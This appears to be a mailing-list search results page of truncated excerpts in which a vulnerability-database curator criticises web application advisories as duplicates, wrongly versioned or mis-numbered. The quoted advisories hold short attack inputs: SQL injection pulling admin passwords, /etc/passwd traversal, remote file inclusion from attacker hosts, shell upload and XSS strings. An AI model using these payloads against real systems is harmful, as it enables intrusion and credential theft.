: Real player resource exhaustion Vulnerability
: Real Networks Real Player is prone to Resource exhaustion vulnerability.
: When processing specially crafted HTML file, Real Player uses a value
: from the file to control a loop operation. Real player fails to validate
: the value before usin
On Thu, 20 Jan 2011, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22785
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_pixie.html
:
: Vulnerability Details:
: The vulnerability exists due to failure in the "/index.php" script to
properly sanitize user-supplied input in "ref
: Vulnerability ID: HTB22827
: Reference:
http://www.htbridge.ch/advisory/file_content_disclosure_in_wikipad.html
: Vulnerability Type: File Content Disclosure
: Risk level: Low
: Vulnerability Details:
: The vulnerability exists due to failure in the "/pages.php" script to
properly sanitize
: Vulnerability ID: HTB22776
: Reference:
http://www.htbridge.ch/advisory/stored_xss_vulnerability_in_diafan_cms.html
: Product: diafan.CMS
: Vulnerability Details:
: User can execute arbitrary JavaScript code within the vulnerable application.
:
: The vulnerability exists due to failure in the
: Vulnerability ID: HTB22770
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_phpmysport.html
: Vulnerability Details:
: The vulnerability exists due to failure in the "/index.php" script to
: properly sanitize user-supplied input in "v1" variable. Attacker can
: alter queries to
Not only was this previously discovered, you don't seem to understand the
variables:
On Thu, 30 Dec 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22754
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_lightneasy_1.html
: Product: LightNEasy
:
: Vulnerability Details:
:
Nice try.. republishing old findings again?
On Thu, 30 Dec 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22750
: Reference: http://www.htbridge.ch/advisory/sql_injection_in_lightneasy.html
: Product: LightNEasy
: The vulnerability exists due to failure in the "/LightNEasy.php" script
Date: 2010-04-03
http://packetstorm.crazydog.pt/1004-exploits/wolfcms-xsrf.txt
This looks to be the same finding in 0.6.0a
On Thu, 25 Nov 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22681
: Reference: http://www.htbridge.ch/advisory/xsrf_csrf_in_wolf_cms.html
: Product: Wolf CMS
:
: Multiple vulnerabilities were found in web application chCounter <= 3.1.3.
:
: Author:
: - Matias Fontanini(mfontan...@cert.unlp.edu.ar).
:
: Requirements:
: - Downloads must be enabled(this is not default).
: - magic_quotes off.
: - Access to administration site
That is a lot of prerequisite
Seems to be a duplicate of:
http://www.exploit-db.com/exploits/9237/
CVE: 2009-3219 OSVDB-ID: 56336
>From 2009-07-23
yes?
On Tue, 16 Nov 2010, eidelwe...@windowslive.com wrote:
:
: AWCM v2.2 Auth Bypass Vulnerabilities
: ###
: New eVuln Advisory:
: Cookie Auth Bypass in Hot Links SQL
: http://evuln.com/vulns/140/summary.html
Already discovered and disclosed:
http://www.exploit-db.com/exploits/8684/
Published: 2009-05-14
: ---[ Summary ]-
: eVuln ID: EV0140
: Software:
: Vulnerability ID: HTB22695
: Reference: http://www.htbridge.ch/advisory/xss_in_compactcms.html
: Product: CompactCMS
: Vendor: compactcms.nl ( http://www.compactcms.nl/ )
: Vulnerable Version: 1.4.1
: Vendor Notification: 04 November 2010
: Vulnerability Type: XSS (Cross Site Scripting)
: Sta
CVE-2008-1609 & CVE-2006-7128
same issue, 4.0 RC1 and RC2. really guys? at least check VDBs before you
publish.
: Vulnerability ID: HTB22666
: Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Did you check the vendor's page?
This page last updated on : May 20, 2006
: Vulnerability ID: HTB22618
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_expression_cms_1.html
: Product: Expression
: Vendor: Backbone Technology ( http://www.backbonetechnology.com )
: Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
How do you know
: Vulnerability ID: HTB22620
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_lantern_cms.html
: Product: Lantern CMS
: Vendor: Lantern ( http://www.lanterncms.com/www/html/7-home-page.asp )
: Vulnerable Version: Current at 18.09.2010 and Probably Prior Versions
>From the vendo
ious actions.
Demonstrating a few of those vectors would be more helpful.
- security curmudgeon
it would really require
something like a CSRF.
Fortunately for attackers, it seems you guys missed the CSRF in this
application that HolisticInfoSec found:
http://holisticinfosec.org/content/view/154/45/
Keep up the solid research guys.
- security curmudgeon
: Vulnerability ID: HTB22564
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_auto_cms.html
: Product: Auto CMS
: Vendor: Roberto Aleman ( http://ventics.com/autocms/ )
: Vulnerable Version: 1.6 and Probably Prior Versions
: Vulnerability Type: XSS (Cross Site Scripting)
As an
: Vulnerability ID: HTB22584
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_compucms.html
: Product: CompuCMS
: Vendor: CompuSoft A/S ( http://www.compusoft.dk/ )
: Vulnerable Version: Current at 06.08.2010 and Probably Prior Versions
Once again, you assign a "version" based
: 1. OVERVIEW
:
: The QtWeb Browser application is vulnerable to Insecure DLL Hijacking
: Vulnerability. Similar terms that describe this vulnerability have been
: come up with Remote Binary Planting, and Insecure DLL
: Loading/Injection/Hijacking/Preloading.
: 3. VULNERABILITY DESCRIPTION
:
: Vulnerability ID: HTB22576
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_tcms_2.html
: Vulnerability ID: HTB22571
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_tcms.html
Aside switching from GET to a POST request, what is the differ
: Product: Eden Platform
: Vendor: Preation ( http://www.preation.com/ )
: Vulnerable Version: Current at 27.07.2010 and Probably Prior Versions
: Risk level: Medium
The vendor web page has a free trial feature, with no obvious version.
Your version of 01.07.2010 appears to be something you de
: Vulnerability ID: HTB22489
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_theeta_cms_2.html
: Vendor: MN Tech Solutions
: Vulnerable Version: 0.0
: The vulnerability exists due to failure in the "forum.php" script to
: properly sanitize user-supplied input in "forum" variab
: Product: WebPress
: Vendor: YWP ( http://www.goywp.com/ )
: Vulnerable Version: Current at 01.07.2010 and Probably Prior Versions
The vendor web page has a demo feature, that is powered by "YWP 13.00.04".
Creating a demo via their site, the changelog shows "05.05.2010 - Released
version 13.0
: Vulnerability ID: HTB22445
: Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_cruxcms.html
: Product: CruxCMS
: Vendor: CruxSoftware
: Vulnerable Version: 3.00 and Probably Prior Versions
: Risk level: Medium
: Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing
This was already disclosed on 2008-01-06 (CVE-2008-4612) in version 4.0.
On Tue, 29 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22442
: Reference:
http://www.htbridge.ch/advisory/xss_vulnerability_in_portalapp_1.html
: Product: PortalApp
: Vendor: Latek
: Vulnerable Version: 4
Already discovered 2010-05-12 (CVE-2010-1994) by Secunia and possibly
Holistic. Original advisories:
http://secunia.com/secunia_research/2010-56
http://holisticinfosec.org/content/view/141/45/
On Tue, 29 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22444
: Reference:
http://
Hello,
For both of your WebDB advisories, you say:
: Product: WebDB
: Vendor: Lois Software
: Vulnerable Version: 2.0a and Probably Prior Versions
: Status: Fixed by Vendor
: Risk level: High
: Solution: There is no need for anybody to upgrade to the latest version.
Why is there no need for
On Sat, 12 Jun 2010, i...@securitylab.ir wrote:
: #
: # Securitylab.ir
: #
: # Application Info:
: # Name: Cherokee Web Server
: # Version: 0.5.3
: # Download:
Discovered 2008-01-21, covered by CVE-2008-0422 / OSVDB 40960.
On Sat, 5 Jun 2010, advis...@htbridge.ch wrote:
: Vulnerability ID: HTB22398
: Reference:
http://www.htbridge.ch/advisory/sql_injection_vulnerability_in_boastmachine.html
: Product: boastMachine
: Vendor: Kailash Nadh
: Vulnerable V
Seriously?
This was reported in Jul 2001 by Hiromitsu Takagi, and assigned
CVE-2001-1161.
http://seclists.org/bugtraq/2001/Jul/22
Would you please:
a) check to see if a vulnerability has been published
b) test current software
c) include the full name of the product you are testing
"IBM Lotu
: Title: Elkapax CMS Multiple Vulnerabilities
:
: Vendor: www.elkapax.com
: Fix: N/A
: Elkapax is a CMS producer in Iran. Search page in Elkapax CMS
:
: product are vulnerable to XSS vulnerability.
:
: Cross Site Scripting vulnerability in Search page in "q" parameter.
:
: http://example.co
On Mon, 13 Apr 2009, mariani...@hotmail.com wrote:
: Discovered by Sirdarckcat from elhacker.net
By 'discovered', you mean 'copied from the disclosure in September 2006'
right?
CVE-2006-4605 through CVE-2006-4608.
: Oracle Database Buffer Overflow in SYS.OLAPIMPL_T.ODCITABLESTART
: Risk Level: High
: Oracle Database Server provides the SYS.OLAPIMPL_T package. This package
: contains the procedure ODCITABLESTART which is vulnerable to buffer
: overflow attacks. Impact: By default SYS.OLAPIMPL_T has EXEC
On Fri, 15 Aug 2008, r3d.w...@yahoo.com wrote:
(pardon the late reply)
: #!user/bin/python
: # -*- coding: cp1256 -*-
:
#
: munky-bliki Lfi
: ZDI-09-007: Apple QuickTime Cinepak Codec MDAT Heap Corruption
: Vulnerability
: http://www.zerodayinitiative.com/advisories/ZDI-09-007
: January 21, 2009
:
: -- CVE ID:
: CVE-2009-2006
CVE-2009-0006 perhaps?
(Note the date, late reply I know..)
On Tue, 29 Jul 2008, Andy Davis wrote:
: The IOS FTP server vulnerabilities were published in an advisory by
: Cisco in May 2007. The FTP server does not run by default, it is not
: widely used and has since been removed from new versions of IOS.
: Therefo
iDefense, CVE or Oracle;
The two iDefense advisories present a bit of confusion over the CVE
assignments and number of vulnerabilities. There appear to be two
vulnerabilities (login.php and common.php) that may have 3 CVE numbers
assigned. Could anyone clarify?
First advisory, mail list post
Hello Assurent & Oracle,
On Tue, 13 Jan 2009, vr-subscription-nore...@assurent.com wrote:
: Oracle BEA WebLogic Server Apache Connector Buffer Overflow
:
: Reference: http://www.bea.com/weblogic/server/
:
: 2. Vulnerability Summary
:
: A remotely exploitable vulnerability has been discovered
sly than Oracle's.
Any input from either side to help clarify?
- security curmudgeon
p.s. Same exact question and CVSS2 scores for SYS.DBMS_AQJMS_INTERNAL
(DB15), CVE-2008-1821, same Oracle CPU.
On Sat, 20 Dec 2008, ad...@bugreport.ir wrote:
: +-->Cross Site Scripting (XSS). Reflected XSS attack in "index.php" in "q"
: parameter.
:
: POC:
:
http://[URL]/chicomas/index.php?q=";alert(/www.BugReport.ir/.source)
This was disclosed on May 5th [1] by Hadi Kiamarsi and was assigned BID
2902
: Have you ever nmap-ed a network with AS/400s? If you have, you probably
: know that doing so will, in at least half the cases, either crash the
: box, hang up one or more services, or really confuse the IP stack to the
: point that the box almost screeches to a halt.
This is frequently obse
: # Phorm v3.0 Remote File Upload Vulnerability
:
: # ilker kandemir
:
:
: # Exploit: http://[site]/[phorm_path]/lib/fileupload.php [+]=>>
upload your shell.php
:
: # http://[site]/[phorm_path]/files/phpshell.php
This also won't work unless an administrator makes changes to
: BellaBiblio Admin Login Bypass
:
: SCRIPT: BellaBiblio
:
: DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip
:
: AUTHOR: ilker kandemir
:
: Bug in;(admin.php)
: if (isset($_COOKIE['bellabiblio'])) {
: if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) {
:
: Olmek Var$a Kaderde Dert Ekleme Derdine Team :)
: Portal:Friend Script 2.5 - 2.4 Remote File İnclude Vulnerable
: Author:Yollubunlar
: http://yollubunlar.Org
:
: Exploit:script_path/inc/tell_a_friend.inc.php?script_root=Sh3ll.txt?
This was discovered on 2005-03-07 and reported for version 2.7
: MEFISTO PreSents...
.. something already disclosed before!
: Script: RIG Image Gallery
: Script Download: http://sourceforge.net/project/showfiles.php?group_id=54367
:
: Contact: ilker Kandemir
:
: Exploit: check_entry.php?dir_abs_src=http://attacker.php?
2006-06-20
http://cve.mitre.org/c
: Discovery by:- Sw33t h4cK3r
:
: POWERED BY: SaphpLesson2.0
: --
:
: Exploit :
: http://Example.com/show/show.php?lessid=[SQL]
Discovered 2006-05-27
http://archives.neohapsis.com/archives/bugtraq/2006-05/0610.html
: Discovery by :- Sw33t h4cK3r
: powered by : saphp
:
:
: Exploit :
: http://Example.com/story/showcat.php?forumid=[SQL]
Discovered 2005-10-24
http://archives.neohapsis.com/archives/bugtraq/2005-10/0275.html
Discovered 2006-04-12
http://archives.neohapsis.com/archiv
: VENDOR :http://nucleuscms.org/
: BY : s3rv3r_hack3r (hackerz.ir admin)
: bug:
: nucleus3.22/nucleus/plugins/skinfiles/index.php = include($DIR_LIBS .
'PLUGINADMIN.php');
: Exloit:
: http://victim/nucleus/plugins/skinfiles/index.php?DIR_LIBS=http://shell
I haven't examined the source cod
: We frequently see requests for contact on this mailing list. Readers
: are encouraged to ensure that their software vendors are aware of the
: following documents, which have more specific guidelines for vendors to
: establish. Because these documents have been co-authored by major
: organ
: ##
: # Fusion Polls (xtrphome) Remote File Inclusion
: ##
Is this Fusion Polls:
Fusion Poll 1.1
http://www.fusionphp.net/
http://www.ezgoal.com/channels/developer/f.asp?f=319691
Fusion Poll
On Tue, 13 Jun 2006, [EMAIL PROTECTED] wrote:
:
http://[SITE]/default.asp?mod=search&type=simple&q=%27+union+select+1%2Cadmin_password%2C3%2C4+from+admin_users+%27+&cmdSearch=Search
:
: credits: EntriKa & The_BeKiR & erne
Which "Ashop" is this?
AShop Software
www.ashopsoftware.com/
Ashop Sho
: --
: foud by: BoNy-m
: Site: http://www.alshmokh.com
: E-mail: [EMAIL PROTECTED]
: --
:
: Search:
: allinurl:tseekdir.cgi
:
: example:
: /tseekdir.cgi?location=/etc/passwd%00
: /tseekdir.cgi?id=1055&location=/etc/passwd%00
: /tsee
:
: By: Mr-X
: Email: [EMAIL PROTECTED]
: Subject: modules name(Sections)SQL Injection
:
:
: example:-
: /modules.php?name=Surveys&op=results&pollID=8&mode=&order=&thold=[SQL]
What product is this in? Searching for "modules name sections" is not that
h
: Discovered by: Qex
: Date: 25 April 2006
:
: /member.php?action=viewpro&member=[XSS]
Can you confirm this? Doing a quick grep of the 1.0.2 source code finds no
occurace of "viewpro" at all. The line above also happens to be exactly
the same as your DevBB disclosure, suggesting this may be
: http://www.activecampaign.com/support/
:
: Version : 1-2-All KB
:* KnowledgeBuilder KB
:* iSalient KB
:* SupportTrio KB
:* visualEdit KB
:* General KB
:
: This is a support-faq script. The questions is asked. But this a script
: hi
-- Forwarded message --
From: Rick Elnor
To: [EMAIL PROTECTED]
Date: Sun, 29 Jan 2006 10:11:08 -0800
Subject: [OSVDB Mods] [Change Request] 22693: Etomite todo.inc.php cij Variable
Arbitrary Command Execution
Hello,
I am Rick Elnor, the Etomite CMS security expert and owner
> Quick clarification on several points based on emails that I've received:
>
> 1) We did notify Apache before going public. ISS X-Force emailed
> Apache in the morning at 9:44am regarding this Advisory. We waited until
> the afternoon before sending to Bugtraq for approval and finally r
58 matches
Mail list logo